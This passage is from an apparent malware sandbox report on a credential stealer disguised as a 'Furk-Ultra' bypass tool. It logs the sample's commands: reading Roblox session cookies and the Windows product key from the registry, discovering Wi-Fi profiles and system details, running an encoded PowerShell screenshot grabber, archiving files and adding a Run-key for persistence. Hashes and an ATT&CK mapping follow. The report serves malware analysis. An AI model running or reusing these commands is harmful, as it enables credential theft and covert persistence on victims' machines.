    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:676
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3104
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3mc5qd4s\3mc5qd4s.cmdline"
        6⤵
        
        PID:2964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0BB.tmp" "c:\Users\Admin\AppData\Local\Temp\3mc5qd4s\CSC6FCB78F9CD214F25879D2A88AB52CE4B.TMP"
        7⤵
        
        PID:4500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4076
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2248
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3856
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5048
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:1068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:5052
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:4968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14122\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\ch3EM.zip" *"
      4⤵
      PID:3988
    - - C:\Users\Admin\AppData\Local\Temp\_MEI14122\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14122\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\ch3EM.zip" *
        5⤵
        Executes dropped EXE
        
        PID:3920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3200
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:4280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:4648
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3184
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3928
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:2028
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:2116
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:2824
- C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass1.exe
  Bypass1.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\Bypass1.exe
    Bypass1.exe
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
      4⤵
      PID:2596
    - - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        5⤵
        Modifies registry key
        
        PID:756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
      4⤵
      PID:4372
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:5000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:1724
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:4644
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:4488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:4896
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4008
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3512
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4020
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2660

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 876 -ip 876
1⤵
PID:2240

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 9546c2eba3af8490a4a56831036b6b01 0fNxznE+/Um2KH+TG22cVQ.0.1.0.0.0
1⤵
PID:5000

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2fzFmfe6vD.tmp

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hYiqm28uC.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\56rqJy9VMA.tmp

Filesize
114KB

MD5
013b18b14247306181ec7ae01d24aa15

SHA1
5ce4cb396bf23585fbcae7a9733fe0f448646313

SHA256
edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44

SHA512
2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

Download Submit
C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\downloads_db

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\downloads_db

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Temp\Furk-Ultra-main\bin\vault\cookies.txt

Filesize
258B

MD5
d8d3827977d25e012ae85e779baccbb9

SHA1
4094adb2594690ec054c0031cd708cf19515f06d

SHA256
7553d67e67ed0056aae67da47ec0e4bf4bbb79aad900ac3a4721cd9247b82612

SHA512
3de3791260c5d8de81c5b8a559edd4e54adfd8aa5748342bcbd52dafa22766a58fb8d0ca40f146559b0272145cf35ec73ee040eda78454f88ac2e6e22edc4494

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12042\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12042\VCRUNTIME140_1.dll

Filesize
48KB

MD5
bba9680bc310d8d25e97b12463196c92

SHA1
9a480c0cf9d377a4caedd4ea60e90fa79001f03a

SHA256
e0b66601cc28ecb171c3d4b7ac690c667f47da6b6183bff80604c84c00d265ab

SHA512
1575c786ac3324b17057255488da5f0bc13ad943ac9383656baf98db64d4ec6e453230de4cd26b535ce7e8b7d41a9f2d3f569a0eff5a84aeb1c2f9d6e3429739

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12042\_bz2.pyd

Filesize
47KB

MD5
758fff1d194a7ac7a1e3d98bcf143a44

SHA1
de1c61a8e1fb90666340f8b0a34e4d8bfc56da07

SHA256
f5e913a9f2adf7d599ea9bb105e144ba11699bbcb1514e73edcf7e062354e708

SHA512
468d7c52f14812d5bde1e505c95cb630e22d71282bda05bf66324f31560bfa06095cf60fc0d34877f8b361ccd65a1b61d0fd1f91d52facb0baf8e74f3fed31cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI12042\_ctypes.pyd

Filesize
56KB

MD5
6ca9a99c75a0b7b6a22681aa8e5ad77b

SHA1
